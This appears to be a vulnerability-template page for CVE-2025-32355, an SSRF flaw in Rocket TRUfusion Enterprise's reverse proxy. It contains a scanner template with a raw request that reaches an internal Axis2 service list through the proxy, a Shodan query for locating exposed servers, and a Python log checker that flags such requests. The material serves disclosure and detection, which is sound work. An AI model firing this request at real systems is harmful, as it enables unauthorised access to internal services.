Rocket TRUfusion Enterprise - Server Side Request Forgery
CVE-2025-32355
Verified
Description
Rocket TRUfusion Enterprise through 7.10.4.0 uses a reverse proxy to handle incoming connections. However, the proxy is misconfigured in a way that allows specifying absolute URLs in the HTTP request line, causing the proxy to load the given resource.
Severity
High
Published Date
February 18, 2026
Template Author
princechaddha, rcesecurity, dhiyaneshdk
CVE-2025-32355.yaml
id: CVE-2025-32355

info:
  name: Rocket TRUfusion Enterprise - Server Side Request Forgery
  author: princechaddha,rcesecurity,DhiyaneshDk
  severity: high
  description: |
    Rocket TRUfusion Enterprise through 7.10.4.0 uses a reverse proxy to handle incoming connections. However, the proxy is misconfigured in a way that allows specifying absolute URLs in the HTTP request line, causing the proxy to load the given resource.
  impact: |
    Attackers can make the proxy load arbitrary resources, potentially leading to information disclosure or further attacks.
  remediation: |
    Update to the latest version with proxy configuration fixes.
  reference:
    - https://www.rcesecurity.com/2026/02/when-audits-fail-from-pre-auth-ssrf-to-rce-in-trufusion-enterprise/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32355
  metadata:
    verified: true
    max-request: 1
    shodan-query: 'html:"TRUfusion Enterprise"'
  tags: cve,cve2025,rocket,trufusion,ssrf,vkev

http:
  - raw:
      - |+
        GET http://127.0.0.1:8080/axis2/services/listServices HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.5
        Connection: keep-alive

    unsafe: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Available services"
          - "Service Description"
        condition: or

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d22c369adcde5e8a0233a677059527b3e17ad15df2348701f90a7b3f6d8337a8022005500565a64099330d8511b9ff4e3a0eec815cb801c8a92d3a57536d31e540d2:922c64590222798bb761d5b6d8e72950
Remediation Steps
Update to the latest version with proxy configuration fixes.
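A log check for the behaviour described above, added here as an example and not part of the template or of the vendor's tooling: it flags access-log requests whose request target is an absolute URL and marks those aimed at loopback, private or link-local addresses. It assumes the reverse proxy writes the raw request line in Common/Combined Log Format; the sample lines and the names classify_target and scan are constructed for this example.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Request field of a Common/Combined Log Format line (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d(?:\.\d)?"')

def classify_target(target):
    """Return None for origin-form targets, a finding dict for absolute-form."""
    if target.startswith("/") or target == "*":
        return None
    try:
        parts = urlsplit(target)
        port = parts.port
    except ValueError:  # malformed authority or port
        return None
    if parts.scheme.lower() not in ("http", "https") or not parts.hostname:
        return None  # e.g. the authority-form target of CONNECT
    host = parts.hostname
    internal = host == "localhost"
    try:
        ip = ipaddress.ip_address(host)
        internal = ip.is_loopback or ip.is_private or ip.is_link_local
    except ValueError:
        pass  # a DNS name: cannot be classified without resolving it
    return {"host": host, "port": port, "internal": internal}

def scan(lines):
    """Collect every request whose target is an absolute http(s) URL."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        finding = classify_target(match.group("target")) if match else None
        if finding:
            finding.update(line=number, method=match.group("method"))
            findings.append(finding)
    return findings

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Feb/2026:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.9 - - [18/Feb/2026:10:00:05 +0000] "GET http://127.0.0.1:8080/axis2/services/listServices HTTP/1.1" 200 2048',
    '198.51.100.4 - - [18/Feb/2026:10:00:09 +0000] "GET http://portal.example.test/login HTTP/1.1" 200 900',
    '198.51.100.4 - - [18/Feb/2026:10:00:12 +0000] "CONNECT example.test:443 HTTP/1.1" 405 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Absolute-form request targets are legal HTTP/1.1, so the internal flag rather than the mere presence of a URL is the signal to triage first.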